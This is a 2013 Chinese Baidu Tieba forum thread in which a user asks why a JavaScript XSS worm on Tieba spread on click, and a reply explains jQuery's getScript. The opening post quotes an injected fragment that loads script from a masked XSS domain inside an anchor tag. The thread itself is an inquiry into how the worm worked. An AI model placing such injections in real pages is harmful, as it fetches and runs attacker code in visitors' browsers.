关于最近的那个有趣的的Javascript病毒
javascript吧
全部回复
仅看楼主
level 1
crazygyl 楼主
病毒的源代码在这里
https://tieba.baidu.com/p/2337515969
树莓派吧里面有一个死掉的病毒链接(原因是这个网站被屏蔽掉了,现在去那个xss的网站直接打开404),这是树莓派吧
https://tieba.baidu.com/f?kw=%CA%F7%DD%AE%C5%C9&fr=ala0
我不太明白为啥病毒会执行,就是点一下就会传播这件事情
我看不到什么地方可以执行,而且这个地方
a:$.getScript(//xss.XXXXXX.js)这个东西,像是一个Javascript的tag,为啥就执行了


求详细解释……
2013年05月20日 04点05分 1
level 11
这个是jquery的方法
getScript 顾名思义就是得到一段javascript代码
例如得到的这段javascirpt如下
(function(){alert("hello, world")})()
得到这段代码立即执行,就会弹出hello, world
2013年05月20日 04点05分 2
嗯,我想问的是怎么一点这个东西就会执行,上述那段代码,他直接写在<a title='' a:$getScript.....></a>这里,这个地方按理说不该解析JS才对,我把这个代码换成alert,也没有对话框弹出...
2013年05月20日 05点05分
1